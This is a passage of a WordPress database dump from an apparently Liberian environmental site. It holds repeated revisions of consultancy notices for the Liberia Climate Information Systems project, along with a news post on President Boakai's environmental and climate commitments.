19:39:23','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5721',24,'ekms_bulletin','',0),(5722,38,'2026-01-26 19:34:31','2026-01-26 19:34:31','<strong>Background </strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management. The EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project). The Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS). The implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decisionmaking, planning, and response actions Countrywide.\r\n\r\n&nbsp;\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n2. Purpose of the Consultancy\r\n\r\nThe purpose of this consultancy is to provide professional supervision and monitoring services for the renovation of the Liberia National Meteorological Station at the Roberts International Airport (RIA). This station is a critical component of Liberia’s national climate and weather monitoring infrastructure and plays a key role in generating accurate meteorological data to support evidence-based planning and risk reduction across sectors. Moreover, this consultancy aligns with the objectives of the Climate Information System (CIS) Project, which seeks to enhance Liberia’s climate resilience through the development of reliable, accessible, and user-driven climate services. By ensuring the quality, safety, and timely execution of the renovation works, this consultancy will contribute directly to strengthening national climate service delivery, improving early warning systems, supporting agriculture, infrastructure development, aviation safety, and disaster preparedness.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe Consultant shall provide a comprehensive professional services for the supervision and monitoring of the renovation works at the Liberia National Meteorological Station located at the Roberts International Airport (RIA). The services aim to ensure that all construction activities are implemented in full compliance with the approved architectural and engineering designs, technical specifications, environmental and safety standards, project timelines, and budgetary provisions.\r\n\r\n3.1Technical Review and Site Familiarization\r\n\r\n➢  Review approved design drawings where available and or develop the required design based on the needs of the beneficiary entity, specifications, bills of quantities (BoQs), and work schedules.\r\n\r\n➢  Conduct a pre-renovation site assessment to understand the scope and sequence of renovation activities.\r\n\r\n3.2Construction Supervision and Monitoring\r\n\r\n➢  Provide day-to-day technical supervision to monitor the contractor’s adherence to design and quality standards.\r\n\r\n➢  Ensure compliance with agreed timelines and identify potential risks or delays early.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>','EOI - Liberia - Professional Services for Supervision and Monitoring of the Renovation of the Liberia National Meteorological Station - Liberia CIS Project','','inherit','closed','closed','','5721-revision-v1','','','2026-01-26 19:34:31','2026-01-26 19:34:31','',5721,'https://ekmsliberia.info/?p=5722',0,'revision','',0),(5723,38,'2026-01-26 19:35:55','2026-01-26 19:35:55','','8a_reoi_professional_services_for_nmc_renovation_at_roberts_international_airport','','inherit','open','closed','','8a_reoi_professional_services_for_nmc_renovation_at_roberts_international_airport','','','2026-01-26 19:35:55','2026-01-26 19:35:55','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/8a_reoi_professional_services_for_nmc_renovation_at_roberts_international_airport.pdf',0,'attachment','application/pdf',0),(5724,38,'2026-01-26 19:39:23','2026-01-26 19:39:23','<strong>Background </strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management. The EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project). The Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS). The implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decisionmaking, planning, and response actions Countrywide.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe purpose of this consultancy is to provide professional supervision and monitoring services for the renovation of the Liberia National Meteorological Station at the Roberts International Airport (RIA). This station is a critical component of Liberia’s national climate and weather monitoring infrastructure and plays a key role in generating accurate meteorological data to support evidence-based planning and risk reduction across sectors. Moreover, this consultancy aligns with the objectives of the Climate Information System (CIS) Project, which seeks to enhance Liberia’s climate resilience through the development of reliable, accessible, and user-driven climate services. By ensuring the quality, safety, and timely execution of the renovation works, this consultancy will contribute directly to strengthening national climate service delivery, improving early warning systems, supporting agriculture, infrastructure development, aviation safety, and disaster preparedness.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe Consultant shall provide a comprehensive professional services for the supervision and monitoring of the renovation works at the Liberia National Meteorological Station located at the Roberts International Airport (RIA). The services aim to ensure that all construction activities are implemented in full compliance with the approved architectural and engineering designs, technical specifications, environmental and safety standards, project timelines, and budgetary provisions.\r\n\r\n<strong>Technical Review and Site Familiarization</strong>\r\n\r\n➢  Review approved design drawings where available and or develop the required design based on the needs of the beneficiary entity, specifications, bills of quantities (BoQs), and work schedules.\r\n\r\n➢  Conduct a pre-renovation site assessment to understand the scope and sequence of renovation activities.\r\n\r\n3.2Construction Supervision and Monitoring\r\n\r\n➢  Provide day-to-day technical supervision to monitor the contractor’s adherence to design and quality standards.\r\n\r\n➢  Ensure compliance with agreed timelines and identify potential risks or delays early.\r\n\r\n</div>\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/8a_reoi_professional_services_for_nmc_renovation_at_roberts_international_airport.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','EOI - Liberia - Professional Services for Supervision and Monitoring of the Renovation of the Liberia National Meteorological Station - Liberia CIS Project','','inherit','closed','closed','','5721-revision-v1','','','2026-01-26 19:39:23','2026-01-26 19:39:23','',5721,'https://ekmsliberia.info/?p=5724',0,'revision','',0),(5725,38,'2026-01-26 20:19:38','2026-01-26 20:19:38','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe local consultant will work with the International Consultant to streamline climate data analysis, decision-making processes, and dissemination of early warnings and advisories to stakeholders and vulnerable communities across the country. This consultancy aims to establish a basis for targeted interventions and to support the monitoring, evaluation, and reporting of project activities and outputs under the Green Climate Fund Simplified Approval Process (SAP) Project (SAP018 \"Enhancing Climate Information Systems for Resilient Development in Liberia (Liberia CIS)\".\r\n\r\n3. The Scope of the Services to be performed\r\n\r\nThe local consultant will work closely with the international consultant and the EPA through the PIU to gather the relevant information needed to perform the study as stated below.\r\n\r\nA. Baseline Assessment and Needs Identification\r\n<ul>\r\n 	<li>Collaborate with the international consultant to review institutional workflows across the EPA, LMS, LHS, and NDMA.</li>\r\n 	<li>Map the availability of data, it current usage of weather and climate information, and identifying operational gaps.</li>\r\n 	<li>Engage sectorial stakeholders (MoA, LWSC, MOH, MOT, etc.) to define information requirements and decision thresholds.</li>\r\n 	<li>Produce a diagnostic report to guide the system design and operational parameters.</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/7a_reoi_local_consultant_to_develop_and_operationalize_an_automated_decision_management_system_adms-1.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Local Consultancy to develop and operationalize an Automated Decision Management System for Climate Services - Liberia CIS Project','','publish','closed','closed','','eoi-liberia-local-consultancy-to-develop-and-operationalize-an-automated-decision-management-system-for-climate-services-liberia-cis-project','','','2026-02-23 10:45:18','2026-02-23 10:45:18','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5725',23,'ekms_bulletin','',0),(5726,38,'2026-01-26 20:16:38','2026-01-26 20:16:38','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe local consultant will work with the International Consultant to streamline climate data analysis, decision-making processes, and dissemination of early warnings and advisories to stakeholders and vulnerable communities across the country. This consultancy aims to establish a basis for targeted interventions and to support the monitoring, evaluation, and reporting of project activities and outputs under the Green Climate Fund Simplified Approval Process (SAP) Project (SAP018 \"Enhancing Climate Information Systems for Resilient Development in Liberia (Liberia CIS)\".\r\n\r\n3. The Scope of the Services to be performed\r\n\r\nThe local consultant will work closely with the international consultant and the EPA through the PIU to gather the relevant information needed to perform the study as stated below.\r\n\r\nA. Baseline Assessment and Needs Identification\r\n<ul>\r\n 	<li>Collaborate with the international consultant to review institutional workflows across the EPA, LMS, LHS, and NDMA.</li>\r\n 	<li>Map the availability of data, it current usage of weather and climate information, and identifying operational gaps.</li>\r\n 	<li>Engage sectorial stakeholders (MoA, LWSC, MOH, MOT, etc.) to define information requirements and decision thresholds.</li>\r\n 	<li>Produce a diagnostic report to guide the system design and operational parameters.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Local Consultancy to develop and operationalize an Automated Decision Management System for Climate Services - Liberia CIS Project','','inherit','closed','closed','','5725-revision-v1','','','2026-01-26 20:16:38','2026-01-26 20:16:38','',5725,'https://ekmsliberia.info/?p=5726',0,'revision','',0),(5728,38,'2026-01-26 20:17:19','2026-01-26 20:17:19','','7a_reoi_local_consultant_to_develop_and_operationalize_an_automated_decision_management_system_adms (1)','','inherit','open','closed','','7a_reoi_local_consultant_to_develop_and_operationalize_an_automated_decision_management_system_adms-1','','','2026-01-26 20:17:19','2026-01-26 20:17:19','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/7a_reoi_local_consultant_to_develop_and_operationalize_an_automated_decision_management_system_adms-1.pdf',0,'attachment','application/pdf',0),(5729,38,'2026-01-26 20:19:38','2026-01-26 20:19:38','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe local consultant will work with the International Consultant to streamline climate data analysis, decision-making processes, and dissemination of early warnings and advisories to stakeholders and vulnerable communities across the country. This consultancy aims to establish a basis for targeted interventions and to support the monitoring, evaluation, and reporting of project activities and outputs under the Green Climate Fund Simplified Approval Process (SAP) Project (SAP018 \"Enhancing Climate Information Systems for Resilient Development in Liberia (Liberia CIS)\".\r\n\r\n3. The Scope of the Services to be performed\r\n\r\nThe local consultant will work closely with the international consultant and the EPA through the PIU to gather the relevant information needed to perform the study as stated below.\r\n\r\nA. Baseline Assessment and Needs Identification\r\n<ul>\r\n 	<li>Collaborate with the international consultant to review institutional workflows across the EPA, LMS, LHS, and NDMA.</li>\r\n 	<li>Map the availability of data, it current usage of weather and climate information, and identifying operational gaps.</li>\r\n 	<li>Engage sectorial stakeholders (MoA, LWSC, MOH, MOT, etc.) to define information requirements and decision thresholds.</li>\r\n 	<li>Produce a diagnostic report to guide the system design and operational parameters.</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/7a_reoi_local_consultant_to_develop_and_operationalize_an_automated_decision_management_system_adms-1.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Local Consultancy to develop and operationalize an Automated Decision Management System for Climate Services - Liberia CIS Project','','inherit','closed','closed','','5725-revision-v1','','','2026-01-26 20:19:38','2026-01-26 20:19:38','',5725,'https://ekmsliberia.info/?p=5729',0,'revision','',0),(5730,38,'2026-01-26 20:33:13','2026-01-26 20:33:13','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision-\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"></div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultant is to develop a Policy Study to Transform the Liberia Meteorological and Hydrological Services (LMHS) into a Single Entity. By achieving this objective, it will provide a strategic framework that supports institutional reform in line with the objectives of the Liberia Climate Information Services (CIS) Project. The consultancy will aims to assess the current fragmented structure of Liberia’s meteorological and hydrological services that are currently managed by separate agencies and propose a coherent policy pathway for unifying them under a centralized, efficient, and autonomous body as well as improving coordination, reducing redundancy, and enhancing the quality, accessibility, and reliability of climate services across the country.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe local consultant will jointly work with the international consultant to deliver this assignment.\r\n\r\nA. Policy and Institutional Review\r\n<ul>\r\n 	<li>The local consultant will work with the International Consultant to conduct a thorough assessment of the existing legal, policy, and institutional frameworks that govern meteorological and hydrological services in Liberia. This involves reviewing the relevant laws, regulations, and institutional arrangements to understand their effectiveness and alignment with national needs.</li>\r\n 	<li>The local consultant will work with the International Consultant to conduct a comprehensive gap analysis to compare Liberia\'s meteorological and hydrological services with international best practices. This analysis should reference the guidelines set forth by the World Meteorological Organization (WMO) and evaluate successful models implemented in other African countries.</li>\r\n</ul>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/6a_reoi_local_consultant_to_develop_policy_to_transform_lmhs.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Local Consultant to Develop Policy Study to Transform LMHS into a Single Entity - Liberia CIS Project','','publish','closed','closed','','eoi-liberia-local-consultant-to-develop-policy-study-to-transform-lmhs-into-a-single-entity-liberia-cis-project','','','2026-01-26 20:33:13','2026-01-26 20:33:13','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5730',22,'ekms_bulletin','',0),(5731,38,'2026-01-26 20:23:37','2026-01-26 20:23:37','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision-\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"></div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultant is to develop a Policy Study to Transform the Liberia Meteorological and Hydrological Services (LMHS) into a Single Entity. By achieving this objective, it will provide a strategic framework that supports institutional reform in line with the objectives of the Liberia Climate Information Services (CIS) Project. The consultancy will aims to assess the current fragmented structure of Liberia’s meteorological and hydrological services that are currently managed by separate agencies and propose a coherent policy pathway for unifying them under a centralized, efficient, and autonomous body as well as improving coordination, reducing redundancy, and enhancing the quality, accessibility, and reliability of climate services across the country.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe local consultant will jointly work with the international consultant to deliver this assignment.\r\n\r\nA. Policy and Institutional Review\r\n<ul>\r\n 	<li>The local consultant will work with the International Consultant to conduct a thorough assessment of the existing legal, policy, and institutional frameworks that govern meteorological and hydrological services in Liberia. This involves reviewing the relevant laws, regulations, and institutional arrangements to understand their effectiveness and alignment with national needs.</li>\r\n 	<li>The local consultant will work with the International Consultant to conduct a comprehensive gap analysis to compare Liberia\'s meteorological and hydrological services with international best practices. This analysis should reference the guidelines set forth by the World Meteorological Organization (WMO) and evaluate successful models implemented in other African countries.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Local Consultant to Develop Policy Study to Transform LMHS into a Single Entity - Liberia CIS Project','','inherit','closed','closed','','5730-revision-v1','','','2026-01-26 20:23:37','2026-01-26 20:23:37','',5730,'https://ekmsliberia.info/?p=5731',0,'revision','',0),(5732,38,'2026-01-26 20:24:05','2026-01-26 20:24:05','','6a_reoi_local_consultant_to_develop_policy_to_transform_lmhs','','inherit','open','closed','','6a_reoi_local_consultant_to_develop_policy_to_transform_lmhs','','','2026-01-26 20:24:05','2026-01-26 20:24:05','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/6a_reoi_local_consultant_to_develop_policy_to_transform_lmhs.pdf',0,'attachment','application/pdf',0),(5734,38,'2026-01-26 20:33:13','2026-01-26 20:33:13','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision-\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"></div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultant is to develop a Policy Study to Transform the Liberia Meteorological and Hydrological Services (LMHS) into a Single Entity. By achieving this objective, it will provide a strategic framework that supports institutional reform in line with the objectives of the Liberia Climate Information Services (CIS) Project. The consultancy will aims to assess the current fragmented structure of Liberia’s meteorological and hydrological services that are currently managed by separate agencies and propose a coherent policy pathway for unifying them under a centralized, efficient, and autonomous body as well as improving coordination, reducing redundancy, and enhancing the quality, accessibility, and reliability of climate services across the country.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe local consultant will jointly work with the international consultant to deliver this assignment.\r\n\r\nA. Policy and Institutional Review\r\n<ul>\r\n 	<li>The local consultant will work with the International Consultant to conduct a thorough assessment of the existing legal, policy, and institutional frameworks that govern meteorological and hydrological services in Liberia. This involves reviewing the relevant laws, regulations, and institutional arrangements to understand their effectiveness and alignment with national needs.</li>\r\n 	<li>The local consultant will work with the International Consultant to conduct a comprehensive gap analysis to compare Liberia\'s meteorological and hydrological services with international best practices. This analysis should reference the guidelines set forth by the World Meteorological Organization (WMO) and evaluate successful models implemented in other African countries.</li>\r\n</ul>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/6a_reoi_local_consultant_to_develop_policy_to_transform_lmhs.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Local Consultant to Develop Policy Study to Transform LMHS into a Single Entity - Liberia CIS Project','','inherit','closed','closed','','5730-revision-v1','','','2026-01-26 20:33:13','2026-01-26 20:33:13','',5730,'https://ekmsliberia.info/?p=5734',0,'revision','',0),(5735,38,'2026-01-26 20:41:03','2026-01-26 20:41:03','<!-- wp:paragraph -->\n<p>MONROVIA, January 26, 2026 – President Joseph Nyuma Boakai, Sr. has reaffirmed his Administration’s commitment to protecting Liberia’s environment and addressing climate change, describing the environment as a key part of national development and future prosperity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering his Annual Message to the 55th Legislature on Monday, President Boakai said his government has strengthened the enforcement of environmental and biodiversity laws to ensure that natural resources are protected and used responsibly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that environmental governance has been decentralized, allowing local communities and authorities to play a stronger role in environmental protection and decision-making.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The President also announced progress on climate change commitments, including Liberia’s ratification of the Biodiversity Beyond National Jurisdiction (BBNJ) Agreement, which supports the protection of marine resources beyond national borders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to President Boakai, the government has improved access to climate finance and established a Carbon Market Authority, a move aimed at helping Liberia benefit from carbon trading while preserving its forests and reducing emissions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On conservation, the President said steps have been taken to clear intruders from Sarpo National Park. He explained that the action is meant to protect wildlife and open the park for tourism and other sustainable activities that can create jobs for Liberians.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>President Boakai further disclosed that a modern environmental laboratory has been established to strengthen environmental monitoring, testing, and enforcement across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that his Administration remains committed to responsible environmental management, noting that environmental protection, economic growth, and national development must move forward together.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The President concluded by assuring Liberians that his government will continue to protect the country’s natural resources for the benefit of both present and future generations.</p>\n<!-- /wp:paragraph -->','President Boakai Reaffirms Commitment to Environmental Protection and Climate Action','','publish','open','open','','president-boakai-reaffirms-commitment-to-environmental-protection-and-climate-action','','','2026-01-26 20:41:05','2026-01-26 20:41:05','',0,'https://ekmsliberia.info/?p=5735',31,'post','',0),(5736,38,'2026-01-26 20:40:25','2026-01-26 20:40:25','','WhatsApp Image 2026-01-26 at 18.25.56','','inherit','open','closed','','whatsapp-image-2026-01-26-at-18-25-56','','','2026-01-26 20:40:25','2026-01-26 20:40:25','',5735,'https://ekmsliberia.info/wp-content/uploads/2026/01/WhatsApp-Image-2026-01-26-at-18.25.56.jpeg',0,'attachment','image/jpeg',0),(5737,38,'2026-01-26 20:41:03','2026-01-26 20:41:03','<!-- wp:paragraph -->\n<p>MONROVIA, January 26, 2026 – President Joseph Nyuma Boakai, Sr. has reaffirmed his Administration’s commitment to protecting Liberia’s environment and addressing climate change, describing the environment as a key part of national development and future prosperity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering his Annual Message to the 55th Legislature on Monday, President Boakai said his government has strengthened the enforcement of environmental and biodiversity laws to ensure that natural resources are protected and used responsibly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that environmental governance has been decentralized, allowing local communities and authorities to play a stronger role in environmental protection and decision-making.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The President also announced progress on climate change commitments, including Liberia’s ratification of the Biodiversity Beyond National Jurisdiction (BBNJ) Agreement, which supports the protection of marine resources beyond national borders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to President Boakai, the government has improved access to climate finance and established a Carbon Market Authority, a move aimed at helping Liberia benefit from carbon trading while preserving its forests and reducing emissions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On conservation, the President said steps have been taken to clear intruders from Sarpo National Park. He explained that the action is meant to protect wildlife and open the park for tourism and other sustainable activities that can create jobs for Liberians.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>President Boakai further disclosed that a modern environmental laboratory has been established to strengthen environmental monitoring, testing, and enforcement across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He stressed that his Administration remains committed to responsible environmental management, noting that environmental protection, economic growth, and national development must move forward together.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The President concluded by assuring 